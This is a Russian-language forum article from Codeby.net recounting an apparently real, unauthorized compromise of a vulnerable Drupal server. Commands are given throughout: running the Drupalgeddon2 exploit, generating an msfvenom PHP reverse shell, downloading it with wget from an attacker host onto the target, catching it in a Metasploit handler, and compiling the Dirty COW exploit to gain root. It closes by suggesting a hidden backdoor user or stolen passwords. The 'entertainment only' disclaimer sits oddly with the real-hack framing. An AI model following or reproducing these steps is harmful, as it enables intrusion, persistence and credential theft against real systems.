• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Статья Hack the Server (Drupal)

Приветствую уважаемую аудиторию форума Codeby.net.

В этой статье мы рассмотрим реальный взлом сервера, на котором расположен сайт, уязвимый к эксплоиту Drupalgeddon2. О нем достаточно информации в сети, потому заострять внимание на этом мы не будем.

1540051052135.png


Используем все доступные нам средства безопасности и анонимности, если этого нет, то можно работать и так:

1540051069126.png


И приступаем к действиям, нам понадобится:

  • Атакующая платформа на базе Linux. (Я использую Kali Linux + Raspbian)
  • Адрес сервера, на котором расположен уязвимый сайт.
Мне попался на глаза такой совершенно случайно, а для вас всегда есть .

Для начала, скачиваем скрипт позволяющий использовать уязвимость Drupalgeddon2, в результате применения которого, мы должны получить шелл drupalgeddon2 от пользователя www-data (apache user).

Код:
git clone https://github.com/dreadlocked/Drupalgeddon2

1540051160112.png


Запускаем скрипт, добавив в качестве аргумента адрес целевого хоста:

Код:
ruby drupalgeddon2.rb http://что-то там/drupal/

1540051206207.png


Положительным итогом для нас, будет доступ к шеллу drupalgeddon2:

1540051223269.png


Как видно из скриншота, у нас есть шелл от пользователя apache и ОС Gentoo с ядром 4.0.5.

drupalgeddon2-шелл достаточно ограничен, он не выводит сообщения об ошибках и не позволяет перемещаться по директориям, но нам его функционала для начала, вполне хватает, следующим шагом, будет получение обратного php-shell на Kali Linux.

Генерируем его, с помощью msfvenom:

Код:
msfvenom –p php/reverse_php LHOST=298.282.222.22 LPORT=4445 –f raw > sh.php

1540051267241.png


Поднимаем локальный веб-сервер и копируем туда нашу полезную нагрузку предварительно убрав расширение .php.

1540051280773.png


На целевом хосте, у нас есть права на запись в директорию /tmp, скачиваем с нашего сервера файл sh, и так как, перейти в другой каталог мы не можем, выполняем следующую команду:

Код:
wget http://19.10.010.010/sh -P /tmp/

Файл будет скопирован в каталог /tmp. Добавляем расширение .php и даем права на запуск.

1540051323331.png


На атакующем хосте (Kali Linux) запускаем Metasploit со следующими параметрами:

Код:
msfconsole
use multi/handler
set payload php/reverse_php
set LHOST 28.28.10.29
set LPORT 4445

На атакуемом хосте запускаем ранее скачанный sh.php:

1540051374449.png


Про проброс портов я рассказывать не буду, надеюсь всем и так понятно, что я делал предварительно.

Позитивный итог этих действий - shell в среде metasploit:

1540051389876.png


Теперь, когда у нас есть полноценный и стабильный шелл, время задуматься о том, как повысить привилегии в системе.

Так как, это Gentoo я сначала искал эксплоиты под версию ядра, но безуспешно, не помог, даже новый инструмент о котором я расскажу в следующей серии.

Потом, приняв всю безысходность ситуации, я решил попробовать .

Загружаем его и компилируем с необходимыми параметрами:

Код:
wget https://www.exploit-db.com/download/40839.c
gcc -pthread 40839.c -o fire –lcrypt

1540051448961.png


Осталось запустить его и указать пароль для ново созданного пользователя firefart.

Перед этим дадим файлу разрешение на запуск:

Код:
./fire pssss

Можем смотреть, что у нас получилось:

Код:
cat /etc/passwd

1540051494606.png


Всё завершилось успешно, закрываем все сессии, логинимся по SSH как firefart:

1540051511051.png


Код:
id

1540051528910.png


Далее, создаем пользователя, который не будет привлекать внимание.

Или, получаем пароли от существующих, всё зависит от ваших умений и фантазии.

1540051545135.png


На этом, можно закончить.

P.S: Статья, носит исключительно развлекательный характер.

P.P.S: Ни один сервер/сайт не пострадал.

Спасибо за внимание.

Специально для Codeby.net.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!